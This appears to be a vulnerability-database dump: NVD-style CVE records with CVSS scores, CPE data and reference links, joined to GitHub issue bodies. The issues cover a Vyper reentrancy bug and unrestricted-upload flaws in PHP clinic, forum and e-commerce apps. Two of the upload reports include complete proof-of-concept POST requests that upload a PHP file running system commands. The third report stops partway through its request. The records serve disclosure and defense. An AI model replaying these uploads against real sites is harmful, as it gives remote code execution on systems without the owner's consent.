"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/vyperlang/vyper/commit/93287e5ac184b53b395c907d40701f721daf8177"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/vyperlang/vyper/issues/2455"
},
{
"source": "security-advisories@github.com",
"tags": [
"Vendor Advisory"
],
"url": "https://github.com/vyperlang/vyper/security/advisories/GHSA-m2v9-w374-5hj9"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/vyperlang/vyper/commit/93287e5ac184b53b395c907d40701f721daf8177"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/vyperlang/vyper/issues/2455"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://github.com/vyperlang/vyper/security/advisories/GHSA-m2v9-w374-5hj9"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:vyperlang:vyper:*:*:*:*:*:python:*:*",
"matchCriteriaId": "65F778D8-E42E-4CDB-BF02-9406D65FD6B6",
"versionEndExcluding": "0.3.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"667"
] | 667 | https://github.com/vyperlang/vyper/issues/2455 | [
"Issue Tracking"
] | github.com | [
"vyperlang",
"vyper"
] | ### Version Information
* vyper Version (output of `vyper --version`): v0.2.16
nonreentrant keys are allowed on default functions, e.g.
```python
@external
@payable
@nonreentrant("default")
def __default__():
pass
```
but it doesn't do anything, here's the output:
```
[seq,
[if, [lt, calldatasize, 4], [goto, fallback]],
[mstore, 28, [calldataload, 0]],
[with, _func_sig, [mload, 0], seq],
[seq_unchecked,
[label, fallback],
[seq,
pass,
# Line 5
pass,
pass,
# Line 4
stop]]],
``` | default functions don't respect nonreentrancy keys | https://api.github.com/repos/vyperlang/vyper/issues/2455/comments | 1 | 2021-09-10T02:33:40Z | 2021-10-04T20:14:05Z | https://github.com/vyperlang/vyper/issues/2455 | 992,830,789 | 2,455 | 6,018 |
CVE-2024-4809 | 2024-05-14T15:44:59.720 | A vulnerability has been found in SourceCodester Open Source Clinic Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file setting.php. The manipulation of the argument logo leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263929 was assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/CveSecLook/cve/issues/26"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.263929"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.263929"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.332581"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/CveSecLook/cve/issues/26"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.263929"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.263929"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.332581"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nikhil-bhalerao:open_source_clinic_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "31D19E63-4EB6-42AC-AA1B-C9E734140902",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/CveSecLook/cve/issues/26 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"CveSecLook",
"cve"
] | # SourceCodester Open Source Clinic Management System in PHP with Full Source Code 1.0 setting.php Unrestricted Upload
# NAME OF AFFECTED PRODUCT(S)
+ Open Source Clinic Management System in PHP with Full Source Code
## Vendor Homepage
+ https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ Cece Chen from Wuhan University
## Vulnerable File
+ setting.php
## VERSION(S)
+ V1.0
## Software Link
+ https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip
# PROBLEM TYPE
## Vulnerability Type
+ File upload
## Root Cause
+ The input obtained from line 23 of the "clinic full source code with database-0/source code/setting.php" file is used in line 26 of the "clinic full source code with database-0/source code/setting.php" file to determine the location of the file to be written, which may allow attackers to change or damage the content of the file, or create a brand new file.
+ 
## Impact
+ Attackers can exploit this vulnerability for unrestricted uploads, and remote attacks may result in RCE.
# DESCRIPTION
+ Cece Chen from Wuhan University found that the file upload operation was triggered in /source code/setting.php, and the _FAILES variable was used to receive the payload. After receiving the attack vector from a remote attacker, it will result in unrestricted uploads, and remote attacks may lead to RCE.
# No verification is required to exploit this vulnerability
# Vulnerability details and POC
## Payload
+ The picture I uploaded here is a photo of carrying a Trojan horse, but due to character confusion, I took a screenshot directly.
+ 
```
POST /setting.php HTTP/1.1
Host: 192.168.31.212:8109
Content-Length: 1484
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.31.212:8109
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYptAOkpiBueYX716
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.31.212:8109/setting.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: s1591159628=lohvd5hnhcjtqckupc1ebb5224; PHPSESSID=mrpcs400nm7p9hmneirs8t9j06
Connection: close
------WebKitFormBoundaryYptAOkpiBueYX716
Content-Disposition: form-data; name="business_name"
Mayuri K
------WebKitFormBoundaryYptAOkpiBueYX716
Content-Disposition: form-data; name="business_email"
mayuri.infospace@gmail.com
------WebKitFormBoundaryYptAOkpiBueYX716
Content-Disposition: form-data; name="business_web"
#
------WebKitFormBoundaryYptAOkpiBueYX716
Content-Disposition: form-data; name="portal_addr"
#
------WebKitFormBoundaryYptAOkpiBueYX716
Content-Disposition: form-data; name="addr"
<p>Maharashtra, India</p>
------WebKitFormBoundaryYptAOkpiBueYX716
Content-Disposition: form-data; name="curr_sym"
$
------WebKitFormBoundaryYptAOkpiBueYX716
Content-Disposition: form-data; name="curr_position"
right
------WebKitFormBoundaryYptAOkpiBueYX716
Content-Disposition: form-data; name="front_end_en"
0
------WebKitFormBoundaryYptAOkpiBueYX716
Content-Disposition: form-data; name="date_format"
Y-m-d
------WebKitFormBoundaryYptAOkpiBueYX716
Content-Disposition: form-data; name="def_tax"
0.20
------WebKitFormBoundaryYptAOkpiBueYX716
Content-Disposition: form-data; name="old_image"
logo for hospital system.jpg
------WebKitFormBoundaryYptAOkpiBueYX716
Content-Disposition: form-data; name="logo"; filename="rce.php"
Content-Type: image/jpeg
<?php system("ipconfig"); ?>
------WebKitFormBoundaryYptAOkpiBueYX716
Content-Disposition: form-data; name="btn_web"
------WebKitFormBoundaryYptAOkpiBueYX716--
```
## Burp screenshot
+ 
+ I successfully executed the PHP script on the terminal
+  | SourceCodester Open Source Clinic Management System in PHP with Full Source Code 1.0 setting.php Unrestricted Upload | https://api.github.com/repos/CveSecLook/cve/issues/26/comments | 0 | 2024-05-10T15:41:06Z | 2024-05-10T15:41:07Z | https://github.com/CveSecLook/cve/issues/26 | 2,289,966,823 | 26 | 6,019 |
CVE-2024-4920 | 2024-05-16T00:15:08.563 | A vulnerability was found in SourceCodester Online Discussion Forum Site 1.0. It has been rated as critical. This issue affects some unknown processing of the file registerH.php. The manipulation of the argument ima leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264455. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/CveSecLook/cve/issues/27"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.264455"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.264455"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.333477"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/CveSecLook/cve/issues/27"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.264455"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.264455"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.333477"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:razormist:online_discussion_forum_site:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F1F9F37D-C115-4EC6-A1DD-FFB3869E79C0",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/CveSecLook/cve/issues/27 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"CveSecLook",
"cve"
] | # SourceCodester Online Discussion Forum Site 1.0 registerH.php Unrestricted Upload
# NAME OF AFFECTED PRODUCT(S)
+ Online Discussion Forum Site
## Vendor Homepage
+ https://www.sourcecodester.com/php/14234/complete-e-commerce-site-phpmysqli.html
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ Cece Chen from Wuhan University
## Vulnerable File
+ registerH.php
## VERSION(S)
+ V1.0
## Software Link
+ https://www.sourcecodester.com/sites/default/files/download/razormist/online-discussion-forum-site.zip
# PROBLEM TYPE
## Vulnerability Type
+ File upload
## Root Cause
+ The input obtained from line 16 of the "registerH.php" file is used in line 20 of the "registerH.php" file to determine the location of the file to be written, which may allow attackers to change or damage the content of the file, or create a brand new file.
+ 
## Impact
+ Attackers can exploit this vulnerability for unrestricted uploads, and remote attacks may result in RCE.
# DESCRIPTION
+ Cece Chen from Wuhan University found that the file upload operation was triggered in registerH.php, and the _FAILES variable was used to receive the payload. After receiving the attack vector from a remote attacker, it will result in unrestricted uploads, and remote attacks may lead to RCE.
# No verification is required to exploit this vulnerability
# Vulnerability details and POC
## Payload
+ The picture I uploaded here is a photo of carrying a Trojan horse, but due to character confusion, I took a screenshot directly.
+ 
```
POST /registerH.php HTTP/1.1
Host: 192.168.31.212:8111
Content-Length: 1066
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.31.212:8111
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTZYA7xSBtyY1gMwx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.31.212:8111/register.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundaryTZYA7xSBtyY1gMwx
Content-Disposition: form-data; name="u_name"
22
------WebKitFormBoundaryTZYA7xSBtyY1gMwx
Content-Disposition: form-data; name="f_name"
22
------WebKitFormBoundaryTZYA7xSBtyY1gMwx
Content-Disposition: form-data; name="pwd"
123456
------WebKitFormBoundaryTZYA7xSBtyY1gMwx
Content-Disposition: form-data; name="e_mail"
22@qq.com
------WebKitFormBoundaryTZYA7xSBtyY1gMwx
Content-Disposition: form-data; name="gender"
1
------WebKitFormBoundaryTZYA7xSBtyY1gMwx
Content-Disposition: form-data; name="dob"
22/22/22
------WebKitFormBoundaryTZYA7xSBtyY1gMwx
Content-Disposition: form-data; name="ima"; filename="rce.php"
Content-Type: image/jpeg
<?php system("ipconfig"); ?>
------WebKitFormBoundaryTZYA7xSBtyY1gMwx
Content-Disposition: form-data; name="add"
11
------WebKitFormBoundaryTZYA7xSBtyY1gMwx
Content-Disposition: form-data; name="sta"
11
------WebKitFormBoundaryTZYA7xSBtyY1gMwx
Content-Disposition: form-data; name="cou"
11
------WebKitFormBoundaryTZYA7xSBtyY1gMwx--
```
## Burp screenshot
+ 
+ I successfully executed the PHP script on the terminal
+  | SourceCodester Online Discussion Forum Site 1.0 registerH.php Unrestricted Upload | https://api.github.com/repos/CveSecLook/cve/issues/27/comments | 0 | 2024-05-13T16:22:30Z | 2024-05-13T16:22:30Z | https://github.com/CveSecLook/cve/issues/27 | 2,293,275,185 | 27 | 6,021 |
CVE-2024-4923 | 2024-05-16T02:15:07.900 | A vulnerability has been found in Codezips E-Commerce Site 1.0 and classified as critical. This vulnerability affects unknown code of the file admin/addproduct.php. The manipulation of the argument profilepic leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264460. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/polaris0x1/CVE/issues/1"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.264460"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.264460"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.333874"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/polaris0x1/CVE/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.264460"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.264460"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.333874"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:codezips:e-commerce_site:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "448FA2B8-9265-4027-B054-7BCE8AD7278A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/polaris0x1/CVE/issues/1 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"polaris0x1",
"CVE"
] | # Codezips E-commerce Site Using PHP With Source Code 1.0 admin/addproduct.php Unrestricted Upload
# NAME OF AFFECTED PRODUCT(S)
+ E-commerce Site Using PHP With Source Code
## Vendor Homepage
+ https://codezips.com/php/e-commerce-site-using-php-with-source-code/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ polaris0x1
## Vulnerable File
+ admin/addproduct.php
## VERSION(S)
+ V1.0
## Software Link
+ https://codeload.github.com/codezips/ecommerce-site-using-php/zip/master
# PROBLEM TYPE
## Vulnerability Type
+ File upload
## Root Cause
+ The input obtained from line 38 of the "/admin/addproduct.php" file is used in line 57 of the "/admin/addproduct.php" file to determine the location of the file to be written, which may allow attackers to change or damage the content of the file, or create a brand new file.
+ 
## Impact
+ Attackers can exploit this vulnerability for unrestricted uploads, and remote attacks may result in RCE.
# DESCRIPTION
+ polaris0x1 found that the file upload operation was triggered in admin/addproduct.php, and the _FAILES variable was used to receive the payload. After receiving the attack vector from a remote attacker, it will result in unrestricted uploads, and remote attacks may lead to RCE.
# No verification is required to exploit this vulnerability
# Vulnerability details and POC
## Payload
+ The picture I uploaded here is a photo of carrying a Trojan horse, but due to character confusion, I took a screenshot directly.
+ 
```
POST /admin/addproduct.php HTTP/1.1
Host: 192.168.31.180:8201
Content-Length: 2958
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.31.180:8201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryu9aV2G3ROxdMpbiR
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.31.180:8201/admin/addproduct.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=aco6iu4oiga2i57hcp6iif1ea0; admin_login=borsha%40gmail.com
Connection: close
------WebKitFormBoundaryu9aV2G3ROxdMpbiR
Content-Disposition: form-data; name="pname"
1
------WebKitFormBoundaryu9aV2G3ROxdMpbiR
Content-Disposition: form-data; name="price"
1
------WebKitFormBoundaryu9aV2G3ROxdMpbiR
Content-Disposition: form-data; name="available"
1
------WebKitFormBoundaryu9aV2G3ROxdMpbiR
Content-Disposition: form-data; name="descri"
1
------WebKitFormBoundaryu9aV2G3ROxdMpbiR
Content-Disposition: form-data; name="category"
women
------WebKitFormBoundaryu9aV2G3ROxdMpbiR
Content-Disposition: form-data; name="type"
clothing
------WebKitFormBoundaryu9aV2G3ROxdMpbiR
